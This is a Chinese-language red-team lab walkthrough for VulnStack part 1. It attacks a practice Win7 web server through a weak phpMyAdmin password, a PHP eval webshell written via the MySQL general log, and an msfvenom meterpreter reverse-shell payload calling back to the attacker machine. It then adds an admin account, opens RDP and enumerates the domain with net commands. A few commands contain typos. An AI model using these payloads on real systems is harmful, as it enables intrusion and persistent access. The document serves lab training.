目录
一、靶场下载地址
二、描述
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019:
三、环境搭建
共有三台机器,Win7是对外的web机,Win2003和Win2008(DC)是内网机器。
VM1(Win7)添加一块网卡,分别设置为:VMnet1(仅主机模式)、VMnet8(NAT模式)
VM2(Win2003)网卡设置为:VMnet1(仅主机模式)
VM2(Win2008)网卡设置为:VMnet1(仅主机模式)
Win7:192.168.52.143、192.168.22.133
win2003:192.168.52.141
Win2008:192.168.52.138
DNS服务器:192.168.52.138
攻击机kali:192.168.22.131
找到并打开phpstudy.exe,启动服务(若启动失败,重启Win7即可)
打开Firefox访问localhost,已确认服务启动
查看了一下,把敏感信息收集起来,比如网站根目录,开启的什么敏感文件,然后我们往下边翻的时候,发现有一个登录框,用常见的弱口令试了一下,发现root,root能登录
四、信息收集
1.探测靶机IP
使用nmap对同一C段主机进行扫描:
nmap -sP 192.168.22.1/24
使用arp-scan对同网段主机进行扫描:
2.端口扫描
使用nmap对靶机进行全扫描(扫描前确保phpstudy的服务已成功启动):
nmap -Pn -A 192.168.22.133
发现开放的端口有80和3306
3.目录扫描
使用dirb对靶机进行目录扫描 :
dirb "http://192.168.202.132"
4.指纹识别
使用whatweb对靶机上的网站进行指纹识别:
whtaweb http://192.168.22.133
使用Nmap对靶机进行指纹识别
nmap -Pn -sV 192.168.22.133
指纹识别依托于目录爆破,没有扫描到关键的cms信息既可能是字典的问题,也可能是靶机上根本就没有部署这样的网站。
五、漏洞探测
从目录扫描中可以看到http://192.168.22.133/phpinfo.php是可以访问的,
因此访问http://192.168.22.133/phpifno.php:
phpinfo.php中存在许多关键信息,不过要具体漏洞具体分析。目录扫描中http://192.168.22.133/phpmyadmin是可以访问的,访问http://192.168.22.133/phpmyadmin:
尝试用上方的弱口令密码登录
登录成功。
六、漏洞利用
一、phpmyadmin
登录phpmyadmin,查看用户权限:
show grants for root@localhost;
使用SQL语句查看是否有无权限
show variables like '%secure_file%';
secure_file_priv 值为 NULL 不能使用into 方法导入shell
我们尝试在日志写 shell ,使用SQL语句开启日志服务
set global general_log = "ON";
查看当前日志:
show variables like 'general%';
修改日志路径
set global general_log_file="C:\\phpStudy\\WWW\\123.php";
再次查看是否修改成功
此时日志成功打开,并且内容会保存到网站根目录的123.php下
将一句话木马写如日志即可
select "<?php eval($_POST['cmd']);?>"
使用蚁剑连接
成功连接
七、后渗透
现在尝试使用kali自带的msf进行渗透,首先制作shell.exe木马
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.22.131 LPORT=8888 -f exe -o shell.exe
赋予权限
将shell.exe上传到WWW目录
建立msf连接
执行shell.exe并建立一个管理员账户test
msf成功上线
开启远程桌面
使用test用户连接远程桌面
连接成功,后续可以将这个账户设置为影子账户(详细可点击这里),以至于权限维持
八、内网渗透
尝试内网信息收集
ipconfig /all 查询本机IP段,所在域等
net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user 本机用户列表
net localhroup administrators 本机管理员[通常含有域用户]
net user /domain 查询域用户
net user 用户名 /domain 获取指定用户的账户信息
net user /domain b404 pass 修改域内用户密码,需要管理员权限
net group /domain 查询域里面的工作组
net group 组名 /domain 查询域中的某工作组
net group "domain admins" /domain 查询域管理员列表
net group "domain controllers" /domain 查看域控制器(如果有多台)
net time /domain 判断主域,主域服务器都做时间服务器
之后我们在进行信息收集,为我们后渗透做准备
当前域名为god,登录用户是administrator,且存在两个网卡,分别是192.168.22.133(外网)和192.168.52.143(内网)
继续查看当前登录域及登录用户信息:
net config Workstation
发现内网共有三台工作主机(包括自己)
本期VulnStack实战(一)先到这里,后续继续更新!!!